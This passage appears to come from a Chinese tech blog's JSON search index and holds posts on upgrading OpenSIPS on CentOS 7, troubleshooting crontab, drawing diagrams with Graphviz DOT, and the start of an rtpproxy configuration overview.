内容如上面所示 执行 make download 执行 make build Core: opensips应用升级 make all -j4 include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。\n1. linux2.6.x86_64 conflicts with file from package .linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/italian/errmsg.sys from install of MySQL-server-5.5.28-1.linux2.6.x86_64 conflicts with file from package MySQL-server-5.1.7-0.i386 file /usr/share/mysql/japanese/errmsg.sys from install of MySQL-server-5.5.28-\n解决方案:rpm -qa | grep mysql | xargs rpm -e \u0026ndash;nodeps\n2. my_con.h:29:19: fatal error: mysql.h: No such file or directory my_con.h:29:19: fatal error: mysql.h: No such file or directory\n解决方案:yum install mysql-devel -y\n3. siprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory ERROR3:\nsiprec_uuid.h:29:23: fatal error: uuid/uuid.h: No such file or directory #include \u0026lt;uuid/uuid.h\u0026gt;\n解决方案:yum install libuuid-devel -y\n4. regex.so: undefined symbol: debug 数据库迁移 opensips不同的版本,所需要的模块对应的表可能都不同,所以需要迁移数据库。\n迁移数据库需要opensipsdbctl命令,这个命令会根据opensipscrlrc文件链接opensips所使用的数据库。\nopensips的升级有个特点新版本的opensipsdbctl只用用来升级之前版本的opensips。\n从官方文档可以看出 2.2版本的opensips要升级到2.4,中间需要经过2.3。也就是说,你需要用opensips 2.3中的opensipsdbctl将 2.2升级到2.3,然后使用opensips 2.4中的opensipsdbctl将 2.3升级到2.4。\n为了加快升级速度,避免在安装不必要的版本,我构建了两个docker镜像,这两个镜像分别是2.3版本的opensips和2.4版本的opensips。我们可以使用这两个镜像中的opensipsdbctl来升级数据库。\ndocker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 docker pull ccr.ccs.tencentyun.com/wangdd/opensips-base:2.4.2 先从2.2升级到2.3\ndocker run -it --name opensips --rm ccr.ccs.tencentyun.com/wangdd/opensips-base:2.3.1 bash vim /usr/local/etc/opensipsctlrc opensipsdbctl migrate opensips_old_db opensips_new_db # 下面会让你输入数据库密码, # 下面可能让你输入y/n, 一律输入y # 如果让你选择字符集,则输入 latin1 然后基于老的数据库,创建新的数据库。对于老的数据库,opensipsdbctl并不会改变它的任何字段。\n首先需要配置/usr/local/etc/opensips/opensipsctlrc文件,把mysql相关的配置修改正确。\n有可能升级过后opensips -V 输出的还是老版本的opensips, 这是需要\n排查PATH /usr/local/sbin/ 是不是在 /usr/sbin的前面 重新连接shell, 有可能环境变量还未更新 可执行文件的位置 # 2.x版本的 /usr/local/sbin/ # 1.x 版本的 /usr/sbin 报错 Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/regex.so\u0026gt;: /usr/local/lib64/opensips/modules/regex.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 26, column 13-14: failed to load module regex.so Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/rest_client.so\u0026gt;: /usr/local/lib64/opensips/modules/rest_client.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 57, column 13-14: failed to load module rest_client.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 99, column 20-21: Parameter \u0026lt;failed_transaction_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 101, column 20-21: Parameter \u0026lt;db_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 102, column 20-21: Parameter \u0026lt;db_missed_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 103, column 20-21: Parameter \u0026lt;cdr_flag\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 104, column 20-21: Parameter \u0026lt;db_extra\u0026gt; not found in module \u0026lt;acc\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/carrierroute.so\u0026gt;: /usr/local/lib64/opensips/modules/carrierroute.so: undefined symbol: debug Jul 18 19:37:22 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 146, column 13-14: failed to load module carrierroute.so Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 147, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 148, column 20-21: Parameter \u0026lt;config_source\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 149, column 19-20: Parameter \u0026lt;use_domain\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:22 [28181] ERROR:core:set_mod_param_regex: no module matching carrierroute found Jul 18 19:37:22 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 150, column 20-21: Parameter \u0026lt;db_failure_table\u0026gt; not found in module \u0026lt;carrierroute\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] ERROR:core:sr_load_module: could not open module \u0026lt;/usr/local/lib64/opensips/modules/dialplan.so\u0026gt;: /usr/local/lib64/opensips/modules/dialplan.so: undefined symbol: debug Jul 18 19:37:23 [28181] ERROR:core:load_module: failed to load module Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 161, column 13-14: failed to load module dialplan.so Jul 18 19:37:23 [28181] ERROR:core:set_mod_param_regex: no module matching dialplan found Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 162, column 20-21: Parameter \u0026lt;db_url\u0026gt; not found in module \u0026lt;dialplan\u0026gt; - can\u0026#39;t set Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bare word \u0026lt;uri\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 26-28: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bare word \u0026lt;myself\u0026gt; found, command calls need \u0026#39;()\u0026#39; Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 35-36: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 37-39: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command: missing \u0026#39;;\u0026#39;? Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 53-54: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 244, column 54-55: bad command!) Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: syntax error Jul 18 19:37:23 [28181] CRITICAL:core:yyerror: parse error in config file /usr/local//etc/opensips/opensips.cfg, line 255, column 2-4: Jul 18 19:37:23 [28181] ERROR:core:main: bad config file (26 errors) Jul 18 19:37:23 [28181] NOTICE:core:main: Exiting.... ","permalink":"https://wdd.js.org/opensips/ch3/centos7-2.4/","summary":"环境声明 系统 centos7 已经安装opensips 2.2 需要升级目标 opensips 2.4.6 要求:当前系统上没有部署mysql服务端程序 升级步骤 升级分为两步\nopensips 应用升级,包括源码的下载,编译等等 opensips 数据库升级,使用opensipsdbctl工具迁移老的数据 Edge: opensips应用升级 升级过程以Makefile交付,可以先新建一个空的目录,如 /root/opensips-update/\n# file: /root/opensips-update/Makefile VERSION=2.4.6 download: wget https://opensips.org/pub/opensips/$(VERSION)/opensips-$(VERSION).tar.gz; tar -zxvf opensips-$(VERSION).tar.gz; build: cd opensips-$(VERSION); make all -j4 include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 make install include_modules=\u0026#34;db_mysql httpd db_http siprec\u0026#34;; # siprec是可选的 新建空目录/root/opensips-update/ 在新目录中创建名为 Makefile的文件, 内容如上面所示 执行 make download 执行 make build Core: opensips应用升级 make all -j4 include_modules=\u0026#34;db_mysql httpd\u0026#34; make install include_modules=\u0026#34;db_mysql httpd\u0026#34; 可能遇到的报错以及解决方案 主要的问题可能是某些包冲突,或者某些库没有安装依赖。在解决问题后,需要重新编译。","title":"opensips centos7 安装与升级"},{"content":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每个多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每个周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9,18 * * 1-5 喝水 每个 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1..12}; do /bin/cmd -arg1 ; sleep 5; done 每隔 15 秒 * * * * * /bin/cmd -arg1 * * * * * sleep 15; /bin/cmd -arg1 * * * * * sleep 30; /bin/cmd -arg1 * * * * * sleep 45; /bin/cmd -arg1 为什么 crontab 指定的脚本没有执行? 有以下可能原因\n没有权限执行某个命令 某个命令不在环境变量中,无法找到对应命令 首先你必须测试一下,你的脚本不使用 crontab 能否正常执行。\n大部分 crontab 执行不成功,都是因为环境变量的问题。\n下面写个例子:\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log cd /root sh test.sh ctrontab -e 将 test.sh 加入 crontab 中\n* * * * * sh /root/test.sh centos crontab 的执行日志在/var/log/cron 中,可以查看执行日志。\n我的机器是树莓派,没有这个文件,但是我是把执行输出到/root/test.log 中的,可以查看这个文件\n可以看到虽然输入了事件,但是并没有输出 opensips 的版本\nMon 1 Jul 13:04:01 BST 2019 Mon 1 Jul 13:05:01 BST 2019 将$PATH 也加入输出,发现Mon 1 Jul 13:10:01 BST 2019 /usr/bin:/bin,而 opensips 这个命令是位于/usr/local/sbin 下,所以无法找到执行文件,当然无法执行\n#!/bin/bash now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 那还不好办吗?\n在当前工作目录执行 echo $PATH, 然后在脚本里设置一个环境变量就能搞定\n#!/bin/bash PATH=\u0026#39;/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\u0026#39; now=`date` msg=`opensips -V` echo \u0026#34;$now $PATH $msg \\n\\n\u0026#34; \u0026gt;\u0026gt; /root/test.log 也可以使用 journalctl -t CROND 查看 crond 的日志\n检查 crontab 是否运行 systemctl status crond systemctl restart crond 在 alpine 中执行 crontab alpine 中没有 systemctl, 需要启动 crond 的守护进程,否则程序定时任务是不会执行的\n#!/bin/sh # start cron /usr/sbin/crond -f -l 8 ","permalink":"https://wdd.js.org/shell/crontab-tips/","summary":"我已经在 crontab 上栽了很多次跟头了,我决定写个总结。\n常用的命令 crontab -l # 显示计划任务脚本 crontab -e # 编辑计划任务 计划任务的格式 时间格式 * # 每个最小单元 / # 时间步长,每隔多长时间执行 */10 - # 区间,如 4-9 , # 散列,如 4,9,10 几个例子 crontab 最小支持的时间单位是 1 分钟,不支持每个多少秒执行一次\n# 每分钟执行 * * * * * cmd # 每小时的15,45分钟执行 15,45 * * * * cmd # 每个周一到周五,早上9点到下午6点之间,每隔15分钟喝一次水 */15 9,18 * * 1-5 喝水 每个 X 秒执行 crontab 的默认最小执行周期是 1 分钟,如果想每隔多少秒执行一次,就需要一些特殊的手段。\n每隔 5 秒 * * * * * for i in {1.","title":"长太息以掩涕兮,哀crontab之难用"},{"content":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显然出图片 digraph用来标记有向图,里面只用用-\u0026gt; 不能用\u0026ndash;, 否则无法显然出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。\ngraph easy{ a [shape=parallelogram] b [shape=egg] a--b; } 还有什么布局姿势? 默认图是从上到下画的,你可以用rankdir = LR来让图从左往右绘制\ndigraph easy { rankdir = LR; a -\u0026gt; b; } 当然,还有其他姿势\nrankdir\nLR 从左往右布局 RL 从右往左布局 TB 从上下往下布局(默认) BT 从下往上布局 多来几个圆,看看效果 digraph easy { rankdir = LR; a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 怎么加注释? 支持两种注释\n// /**/ digraph easy { a -\u0026gt; b; // 从a到b b -\u0026gt; c; /* 从b到c */ } 句尾要不要加分号? 答:分号不是必须的,你随意\n如何起个别名? 不起别名的时候,名字太长,引用不方便。\ngraph easy{ \u0026#34;直到确定,手的温度来自你心里\u0026#34;--\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;; \u0026#34;这一刻,也终于勇敢说爱你\u0026#34; -- \u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34; } 起个别名,快速引用\ngraph easy{ a [label=\u0026#34;直到确定,手的温度来自你心里\u0026#34;]; b [label=\u0026#34;这一刻,也终于勇敢说爱你\u0026#34;]; c [label=\u0026#34;一开始 我只顾着看你, 装做不经意 心却飘过去\u0026#34;] a -- b; b -- c; } 统一设置点线的样式 digraph easy{ rankdir = LR; node [color=Red,shape=egg] edge [color=Pink, style=dashed] a -\u0026gt; b; b -\u0026gt; c; a -\u0026gt; c; c -\u0026gt; d; a -\u0026gt; d; } 加点颜色 digraph easy{ bgcolor=Pink; b [style=filled, fillcolor=yellow, center=true] a-\u0026gt;b; } 禁用关键词 下面的关键词,不区分大小写,不能作为节点的名字,如果你用了,你的图就画不出来\nnode, edge, graph, digraph, subgraph, and strict\n下面的写法会导致绘图失败\ngraph a { node -- edge } 但是关键词可以作为Label\ngraph a { a [label=\u0026#34;node\u0026#34;] b [label=\u0026#34;edge\u0026#34;] a -\u0026gt; b } 快捷方式 - 串起来 # 方式1 两点之间一个一个连接 digraph { a -\u0026gt; b; b -\u0026gt; c; c -\u0026gt; d; } # 方式2 直接串起来所有的点 digraph { a -\u0026gt; b -\u0026gt; c -\u0026gt; d; } # 方式3 直接串起来所有的点, 也可换行 digraph { a-\u0026gt;b -\u0026gt;c -\u0026gt;d -\u0026gt;e; } 对比发现,直接串起来的话,更简单,速度更快。对于无向图 也可以用 a -- b -- c -- d 的方式串起来。\n快捷方式 - 大括号 对于上面的图,也有两种绘制方法。用大括号的方式明显更好呀! 😺\n# 方式1 digraph { a -\u0026gt; b; a -\u0026gt; c; a -\u0026gt; d; b -\u0026gt; z; c -\u0026gt; z; d -\u0026gt; z; } # 方式2 digraph { a -\u0026gt; {b;c;d} {b;c;d} -\u0026gt; z } 数据结构 UML 怎么画呀? 比如说下面的typescript数据结构\ninterface Man { name: string; age: number; isAdmin: boolean } interface Phone { id: number; type: string; } 注意:node [shape=\u0026ldquo;record\u0026rdquo;]\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|age:number|isAdmin:boolean}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|type:string}\u0026#34;] } 数据结构之间的关系如何表示? 锚点 例如Man类型有个字段phone, 是Phone类型的\ninterface Man { name: string; age: number; isAdmin: boolean; phone: Phone } interface Phone { id: number; type: string; } interface Plain { key1:aaa; key2:bbb; } 注意lable里面的内容,其中\u0026lt;\u0026gt;这个符号可以理解为一个锚点。\nman:age-\u0026gt;plain:key1 这个意思是man的age锚点连接到plain的key1锚点。\ndigraph { node [shape=\u0026#34;record\u0026#34;] man[label=\u0026#34;{Man|name:string|\u0026lt;age\u0026gt;age:number|isAdmin:boolean|\u0026lt;phone\u0026gt;phone:Phone}\u0026#34;] phone[label=\u0026#34;{Phone|id:number|\u0026lt;type\u0026gt;type:string}\u0026#34;] plain[label=\u0026#34;{Plain|\u0026lt;key1\u0026gt;key1:aaa|key2:bbb}\u0026#34;] man:phone-\u0026gt;phone man:age-\u0026gt;plain:key1 [color=\u0026#34;red\u0026#34;] phone:type-\u0026gt;plain:key1 } hash 链表 digraph { rankdir=LR; node [shape=\u0026#34;record\u0026#34;,height=.1, width=.1]; node0 [label = \u0026#34;\u0026lt;f0\u0026gt;a |\u0026lt;f1\u0026gt;b |\u0026lt;f2\u0026gt;c|\u0026#34;, height=2.5]; node1 [label = \u0026#34;{\u0026lt;n\u0026gt; a1 | a2 | a3 | a4 |\u0026lt;p\u0026gt; }\u0026#34;]; node2 [label = \u0026#34;{\u0026lt;n\u0026gt; b1 | b2 |\u0026lt;p\u0026gt; }\u0026#34;]; node3 [label = \u0026#34;{\u0026lt;n\u0026gt; c1 | c2 |\u0026lt;p\u0026gt; }\u0026#34;]; node0:f0-\u0026gt;node1:n [headlabel=\u0026#34;a link\u0026#34;] node0:f1-\u0026gt;node2:n [headlabel=\u0026#34;b link\u0026#34;] node0:f2-\u0026gt;node3:n [headlabel=\u0026#34;c link\u0026#34;] } label {}的作用 digraph { node [shape=\u0026#34;record\u0026#34;]; node0 [label = \u0026#34;0|a|b|c|d|e\u0026#34;,height=2.5]; node1 [label = \u0026#34;{1|a|b|c|d|e}\u0026#34;,height=2.5]; } 对于record而言\n有{} , 则属性作用于整体 无{}, 则属性作用于个体 分组子图 subgraph 关键词标记分组 组名必需以cluster开头 graph { rankdir=LR node [shape=\u0026#34;box\u0026#34;] subgraph cluster_1 { label=\u0026#34;network1\u0026#34;; bgcolor=\u0026#34;mintcream\u0026#34;; host_11 [label=\u0026#34;router\u0026#34;]; host_12; host_13; } subgraph cluster_2 { label=\u0026#34;network2\u0026#34;; bgcolor=\u0026#34;mintcream\u0026#34;; host_21 [label=\u0026#34;router\u0026#34;]; host_22; host_23; } host_12--host_11; host_13--host_11; host_11--host_21; host_22--host_21; host_23--host_21; } 流程图 二等车厢座位示意图 digraph{ label=\u0026#34;二等车厢座位示意图\u0026#34; node [shape=record]; struct3 [ shape=record, label=\u0026#34;车窗|{ {01A|01B|01C}| {02A|02B|02C}| {03A|03B|03C} } |过道|{ {01D|01F}| {02D|02F}| {03D|03F} }|车窗\u0026#34; ]; } Node Port 可以使用nodePort来调整目标的连接点, node Port可以理解为地图上的东南西北。\nn | w\u0026lt;----+----\u0026gt; e | s digraph { rankdir=LR node [shape=box] a-\u0026gt;b:n [label=n] a-\u0026gt;b:ne [label=ne] a-\u0026gt;b:e [label=e] a-\u0026gt;b:se [label=se] a-\u0026gt;b:s [label=s] a-\u0026gt;b:sw [label=sw] a-\u0026gt;b:w [label=w] a-\u0026gt;b:nw [label=nw] } 电磁感应线圈 \u0026lt;\u0026gt;可以用来自定义锚点,锚点可以用来连线。\ndigraph{ node [shape=record]; edge[style=dashed] t [style=filled;fillcolor=gray;label=\u0026#34;\u0026lt;l\u0026gt;N| |||||||\u0026lt;r\u0026gt;S\u0026#34;] t:l-\u0026gt;t:r [color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:l-\u0026gt;t:r[color=red] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] t:r:s-\u0026gt;t:l:s[color=green] } 三体纠缠 digraph{ nodesep=.8 ranksep=1 rankdir=TD node[shape=circle] edge [style=dashed] a[style=filled;fillcolor=red;label=\u0026#34;\u0026#34;;color=red] b[style=filled;fillcolor=red2;label=\u0026#34;\u0026#34;;color=red2] c[style=filled;fillcolor=red4;label=\u0026#34;\u0026#34;;color=red4] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] a-\u0026gt;b[color=red] a-\u0026gt;c[color=green] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] b-\u0026gt;c[color=orange] b-\u0026gt;a[color=red] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] c-\u0026gt;a[color=green] c-\u0026gt;b[color=orange] } 二叉树 digraph { node [shape = record,height=.1]; t0 [label=\u0026#34;\u0026lt;l\u0026gt;|9|\u0026lt;r\u0026gt;\u0026#34;] t1 [label=\u0026#34;\u0026lt;l\u0026gt;|1|\u0026lt;r\u0026gt;\u0026#34;] t5 [label=\u0026#34;\u0026lt;l\u0026gt;|5|\u0026lt;r\u0026gt;\u0026#34;] t6 [label=\u0026#34;\u0026lt;l\u0026gt;|6|\u0026lt;r\u0026gt;\u0026#34;] t11 [label=\u0026#34;\u0026lt;l\u0026gt;|11|\u0026lt;r\u0026gt;\u0026#34;] t34 [label=\u0026#34;\u0026lt;l\u0026gt;|34|\u0026lt;r\u0026gt;\u0026#34;] t0:l-\u0026gt;t5 t0:r-\u0026gt;t11 t5:l-\u0026gt;t1 t5:r-\u0026gt;t6 t11:r-\u0026gt;t34 } 水平分层 相关的节点,可以使用rank属性,使其分布在相同的水平层次。\ndigraph{ nodesep=.3 ranksep=.8 node [shape=none] 应用层 -\u0026gt; 运输层 -\u0026gt; 网络层 -\u0026gt; 链路层; node [shape=box]; http;websocket;sip;ssh; tcp;udp; icmp;ip;igmp; arp;rarp; {rank=same;应用层;http;websocket;sip;ssh} {rank=same;运输层;tcp;udp} {rank=same;网络层;icmp;ip;igmp} {rank=same;链路层;arp;硬件接口;rarp} http-\u0026gt;tcp websocket-\u0026gt;tcp; sip-\u0026gt;tcp; sip-\u0026gt;udp; ssh-\u0026gt;tcp; tcp-\u0026gt;ip; udp-\u0026gt;ip; ip-\u0026gt;igmp; icmp-\u0026gt;ip; ip-\u0026gt;硬件接口; arp-\u0026gt;硬件接口; 硬件接口-\u0026gt;rarp; } 最后挑战,画个小人 digraph easy{ nodesep = 0.5 header [shape=circle, label=\u0026#34;^_^\u0026#34;, style=filled, fillcolor=pink] body [shape=invhouse, label=\u0026#34;~ ~\\n~ ~\\n~ ~\u0026#34;, center=true, style=filled, fillcolor=peru] leftHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightHand [shape=Mcircle, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] leftFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] rightFoot [shape=egg, label=\u0026#34;\u0026#34;, style=filled, fillcolor=palegoldenrod] header-\u0026gt;body [arrowhead=crow]; body-\u0026gt;leftHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, tailport=ne]; body-\u0026gt; rightHand [arrowhead=invodot, penwidth=3, color=cornflowerblue, tailport=nw]; body -\u0026gt; leftFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] body -\u0026gt; rightFoot [arrowhead=tee, penwidth=5, color=cornflowerblue] } 还有那些颜色可以使用呢? 颜色预览:http://www.graphviz.org/doc/info/colors.html\n还有那些箭头的样式可以用呢? 我的图没预览出来,怎么办? 一般来说,如果图没有渲染出来,都是因为绘图语法出问题了。\n我刚刚开始用的时候,就常常把\u0026ndash;用在有向图中,导致图无法预览。建议官方可以把报错信息提示给用户。\n目前来说,这个错误信息只在控制台中打印了,需要按F12打开浏览器的console界面。看看哪里出错了,然后找到对应的位置修改。\n参考 https://graphviz.gitlab.io/_pages/pdf/dotguide.pdf https://casatwy.com/shi-yong-dotyu-yan-he-graphvizhui-tu-fan-yi.html 附件 dotguide.pdf\n","permalink":"https://wdd.js.org/posts/2019/06/","summary":"语雀官方的Graphviz感觉太复杂,我还是写一个简单一点的吧。\n两个圆一条线 注意\ngraph是用来标记无向图,里面只能用\u0026ndash;,不能用-\u0026gt;,否则无法显然出图片 digraph用来标记有向图,里面只用用-\u0026gt; 不能用\u0026ndash;, 否则无法显然出图片 graph easy { a -- b; } 连线加个备注 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;] } 你真漂亮,要大点,红色显眼点 graph easy{ a--b [label=\u0026#34;你真漂亮\u0026#34;, fontcolor=red, fontsize=34] } 两个圆,一个带有箭头的线 注意,这里用的digraph, 用来表示有向图\ndigraph easy { a -\u0026gt; b; } 如何画虚线呢? digraph easy { a -\u0026gt; b [style=dashed]; } 椭圆太单调了,有没有其他形状? shape\nbox 矩形 polygon ellipse circle 圆形 point egg 蛋形 triangle 三角形 plaintext 使用文字 diamond 钻石型 trapezium 梯形 parallelogram 斜的长方形 house hexagon octagon doublecircle doubleoctagon tripleoctagon invtriangle invtrapezium invhouse Mdiamond Msquare Mcircle none record Mrecord graph easy { node [shape=box] a -- b; } 形状也可以直接给节点定义。","title":"Graphviz教程 你学废了吗?"},{"content":"rtppoxy能提供什么功能? VoIP NAT穿透 传输声音、视频等任何RTP流 播放预先设置的呼入放音 RTP包重新分片 包传输优化 VoIP VPN 穿透 实时流复制 rtpproxy一般和那些软件集成? opensips Kamailio Sippy B2BUA freeswitch reSIProcate B2BUA rtpporxy的工作原理 启动参数介绍 参数 功能说明 例子 -l ipv4监听的地址 -l 192.168.3.47 -6 ipv6监听的地址 -s 控制Socket, 通过这个socket来修改,创建或者删除rtp session -s udp:192.168.3.49:6890 -F 默认情况下,rtpproxy会警告用户以超级用户的身份运行rtpproxy并且不允许远程控制。使用-F可以关闭这个限制 -m 最小使用的端口号,默认35000 -m 20000 -M 最大使用的端口号,默认65000 -M 50000 -L 单个进程最多可以使用的文件描述符。rtpproxy要求每个session使用4个文件描述符。 -L 20000 -d 日志级别,可选DBUG, INFO, WARN, ERR and CRIT, 默认DBUG -d ERR -A 广播地址,用于rtpprxy在NAT防火墙内部时使用 -A 171.16.200.13 -f 